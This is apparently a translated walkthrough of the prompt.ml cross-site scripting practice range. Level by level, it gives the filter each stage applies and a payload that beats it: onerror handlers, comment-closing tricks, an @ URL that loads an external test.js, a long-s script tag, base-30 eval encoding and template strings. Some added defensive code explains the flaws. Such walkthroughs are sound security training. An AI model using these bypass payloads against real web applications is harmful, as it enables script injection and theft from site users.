Online practice range: prompt.ml
2022-07-30 10:10:00 【orange oak】
Practice range URL: http://prompt.ml/0
0x0

There is no filtering at all, so just close the output directly. The extra quote and angle bracket that follow need to be commented out.
a"><!--

0x1

This level filters out everything enclosed in angle brackets, so the script tag no longer works. Try an img tag instead.
<img type="image" src=1 onerror=prompt(1)//

0x2

This level filters the two symbols "[" and "(", so they cannot be used. Backticks can be used in place of parentheses.
<script>eval.call`${'prompt\u00281)'}`</script>

0x3

This level turns the comment symbol into an underscore. There is a small trick here: "--!>" can also be used to close a comment.
--!><script>prompt(1)</script><!--

0x4

This level only accepts input that starts with http://prompt.ml/. The @ symbol can be used to link to an external file and bypass the check. Note that the / may not be recognized when you write it; it can be changed to its encoded form.
http://prompt.ml%[email protected]/test.js

In test.js, just write prompt(1).
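The weakness in this level is that the check looks at the start of the string while the browser decides the host by parsing the URL. The following is an added example, not code from the original post, comparing the two checks; example.org is a constructed stand-in host and the decode-then-compare shape of the weak check is an assumption.

```javascript
// Added example: prefix matching vs. parsing the URL before trusting its host.
// example.org is a constructed stand-in for an external host.
const TRUSTED_PREFIX = 'http://prompt.ml/';
const TRUSTED_HOST = 'prompt.ml';

// Weak check (assumed shape): decode the input, then compare the start of the string.
function prefixCheck(input) {
  return decodeURIComponent(input).startsWith(TRUSTED_PREFIX);
}

// Hardened check: let the URL parser decide what the host is.
function hostCheck(input) {
  let url;
  try {
    url = new URL(input);
  } catch {
    return false; // not an absolute URL
  }
  return url.protocol === 'http:' &&
    url.hostname === TRUSTED_HOST &&
    url.username === '' && url.password === ''; // reject any userinfo part
}

// Show what the parser sees next to the verdict of each check.
function report(input) {
  const u = new URL(input);
  return {
    input,
    host: u.hostname,
    userinfo: u.username,
    prefix: prefixCheck(input),
    parsed: hostCheck(input),
  };
}

const samples = [
  'http://prompt.ml/test.js',                // really on the trusted host
  'http://prompt.ml%2f@example.org/test.js', // trusted name sits in the userinfo part
];
const results = samples.map(report);
console.table(results);
```

Everything before the @ is userinfo, so the second sample passes the prefix check while the parser reports example.org as the host.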
0x5

This level also replaces > and anything that starts with on and ends with =, so just use a newline.
1"type="image"src=1 onerror
="prompt(1)"

0x6

The example for this level says to enter something of the form http://httpbin.org/post#{"name":"Matt"}, and the # splits the string into an array. formURL takes element 0 of this array and formData takes element 1. That is, if the input is http://httpbin.org/post#{"name":"Matt"}, then element 0 is http://httpbin.org/post and element 1 is {"name":"Matt"}. A form element is then created, the URL is assigned to the form's action, and the method is set to post. The code then loops over formData: for each key i it creates an input and sets input.name = i, where i is the key in the formData object (here name), and sets the value to the corresponding formData value (here Matt). These steps amount to building a form. Finally the form's action is checked: if it does not contain script or data, the form is output; if it does, the message below is returned.
When the payload is built as javascript:prompt(1) it can be output, but here there is no way for it to get past that check. An action can be used to override the earlier action: when two values share the name action, the later one overwrites the earlier one. So this level is solved by using a later action to overwrite the earlier action property.
javascript:prompt(1)#{"action":"aaaaa"}

0x7

This level also gives an example of the output format, dog#cat#bird#mouse…, and each p tag has a character limit of no more than 12 characters. Comments can be used here: comment out the redundant content, and the remaining pieces join together as desired.
"><script>/*#*/prompt(/*#*/1)/*#*/</script>

This is how the pieces land in the output. Each /* ... */ pair comments out the markup between two segments, giving the first, second and third comment:
<p class="comment" title=""><script>/*"></p>
<p class="comment" title="*/prompt(/*"></p>
<p class="comment" title="*/1)/*"></p>
<p class="comment" title="*/</script>"></p>
The final piece is: "><script>prompt(1)</script>
0x8

Here \r\n means moving to the start of the next line. This level filters these out to nothing, and also filters out <, / and ". This is where a JavaScript detail comes in: enter U+2028 and U+2029 directly.
JavaScript strings accept characters entered directly as well as their escaped forms. However, JavaScript specifies 5 characters that cannot be used directly in a string and can only be used in escaped form:
- U+005C: backslash
- U+000D: carriage return
- U+2028: line separator
- U+2029: paragraph separator
- U+000A: line feed
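The following added example (not part of the original post) measures how the engine treats these characters and compares the level's filter with one that also removes U+2028 and U+2029. pageFilter is reconstructed from the description above and is an assumption, as are all function names. Engines from ES2019 onward accept raw U+2028 and U+2029 inside string literals, but both still end a line everywhere else, including a // comment.

```javascript
// Added example. pageFilter is reconstructed from the description above (assumption).
const pageFilter = (s) => s.replace(/[\r\n<\/"]/g, '');
// Hardened variant: also drop the two Unicode line terminators.
const strictFilter = (s) => s.replace(/[\r\n\u2028\u2029<\/"]/g, '');

// Does `ch` end a // comment? The only live code in the body follows `ch`.
function endsLineComment(ch) {
  try {
    return new Function('// note' + ch + 'return true')() === true;
  } catch {
    return false;
  }
}

// Can `ch` appear raw inside a double-quoted string literal?
function allowedRawInString(ch) {
  try {
    new Function('return "a' + ch + 'b"');
    return true;
  } catch {
    return false; // SyntaxError: the literal was cut off by a line terminator
  }
}

// Constructed sample set: four line terminators plus TAB as a control.
const candidates = { LF: '\n', CR: '\r', LS: '\u2028', PS: '\u2029', TAB: '\t' };

function survey() {
  const rows = {};
  for (const [name, ch] of Object.entries(candidates)) {
    rows[name] = {
      endsComment: endsLineComment(ch),
      rawInString: allowedRawInString(ch),
      passesPageFilter: pageFilter('x' + ch + 'y').includes(ch),
      passesStrictFilter: strictFilter('x' + ch + 'y').includes(ch),
    };
  }
  return rows;
}

console.table(survey());
```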
So the input looks like this; copy the text below and paste it in as the answer.
0x9

This level turns every < followed by a letter into < followed by an underscore, and converts all letters to uppercase. So do not put a letter directly after <: ſ can be used, since it is converted to s. If it does not work, try another browser.
<ſcript src="http://127.0.0.1/test.js"></ſcript>
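The root cause here is ordering: the filter runs on the text before the case mapping changes it. The following added example (not from the original post) shows both orders and a helper that flags non-ASCII characters whose case mapping lands on ASCII letters; the filter is reconstructed from the description above (an assumption) and the sample uses a harmless, constructed span tag.

```javascript
// Added example; neutralise is reconstructed from the description above (assumption).
const neutralise = (s) => s.replace(/<([a-zA-Z])/g, '<_$1');

// Order described above: filter first, then uppercase.
const filterThenUpper = (s) => neutralise(s).toUpperCase();
// Safer order: apply the case mapping first so the filter sees the final text.
const upperThenFilter = (s) => neutralise(s.toUpperCase());

// List non-ASCII characters whose upper/lower case mapping is plain ASCII letters.
function asciiCaseCollisions(s) {
  const hits = [];
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (cp < 0x80) continue; // ASCII maps to ASCII, nothing to flag
    for (const mapped of [ch.toUpperCase(), ch.toLowerCase()]) {
      if (mapped !== ch && /^[A-Za-z]+$/.test(mapped)) {
        const hex = cp.toString(16).toUpperCase().padStart(4, '0');
        hits.push({ char: ch, codePoint: 'U+' + hex, mapsTo: mapped });
      }
    }
  }
  return hits;
}

// Constructed sample: a harmless tag spelled with U+017F (long s).
const sample = '<\u017Fpan>ok</\u017Fpan>';

console.log(filterThenUpper(sample));     // the filter never saw a letter after <
console.log(upperThenFilter(sample));     // the filter sees the mapped letter
console.table(asciiCaseCollisions(sample));
console.table(asciiCaseCollisions('\u0131\u212A')); // dotless i, Kelvin sign
```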

0xA

This level replaces prompt with alert and strips out single quotes. That is convenient: we can split prompt with a single quote, since the single quotes are dropped anyway.
pro'mpt(1)
0xB

This level uses a little trick. Use this to make the popup appear:
"(prompt(1))in"

0xC

This level also drops single quotes and converts prompt to alert, but the difference is that the filtering happens first and the replacement afterwards, so the previous trick no longer works.
Here is a function that can be used; it is equivalent to converting letters into a decimal number.
eval(630038579..toString(30))(1)

parseInt: parses a string and returns a decimal integer for the given radix; the radix range is 2-36.
But when converting prompt, no number comes out for a radix below 26, only NaN; from 26 onward there is a value. This is because the digits are made up of 0-9 plus a-z, and p is the 16th letter; adding the 10 digits before it gives 26, so values start at radix 26.
This may be hard to follow. Take hexadecimal: its largest letter is F, the 6th letter of the alphabet, and adding the 10 digits before it gives base 16.
Why base 30 here? Because the last letter of prompt is t, the 20th letter of the alphabet, and adding the 10 digits before it gives 30. A radix lower than 30 does not include t, so the word would be incomplete.
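The radix reasoning above can be checked directly. The following added example (not from the original post; all function names are assumptions) computes the smallest radix that can hold a word and shows what survives a parseInt/toString round trip at radix 25, 26, 29, 30 and 36. It also shows why a keyword blocklist that runs on the raw text never sees a word carried as a number.

```javascript
// Added example: which radix can carry a word through parseInt and toString.
// Digit values: 0-9 are 0..9 and a-z are 10..35.
const digitValue = (ch) => parseInt(ch, 36);

// Smallest radix in which every character of `word` is a valid digit.
function minRadix(word) {
  if (!/^[0-9a-z]+$/i.test(word)) throw new RangeError('only 0-9 and a-z are digits');
  return Math.max(...[...word].map(digitValue)) + 1;
}

// What survives a parseInt -> toString round trip in the given radix.
// parseInt stops at the first invalid digit, so a low radix truncates the word.
function roundTrip(word, radix) {
  const n = parseInt(word, radix);
  return Number.isNaN(n) ? null : n.toString(radix);
}

function table(word, radixes) {
  return radixes.map((radix) => ({
    radix,
    number: parseInt(word, radix),
    decoded: roundTrip(word, radix),
  }));
}

const word = 'prompt';
console.log('minimum radix:', minRadix(word));
console.table(table(word, [25, 26, 29, 30, 36]));

// A blocklist on the raw text cannot match a word that is carried as a number.
const encoded = String(parseInt(word, 30));
console.log(encoded, 'contains the word:', encoded.includes(word));
```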
0xF

This level also gives the output format and limits each p tag to a maximum of 15 characters. It also filters out the comment symbol used last time, but the <!-- --> style of comment can be used. However, when I handled it the same way as level 7, it did not succeed, and after trying each variation it still did not succeed:
"><!--#--><script><!--#-->prompt<!--#-->(1)<!--#--></script>

So I tried the template string approach, and it worked:
"><script>` ${prompt(1)} `</script>
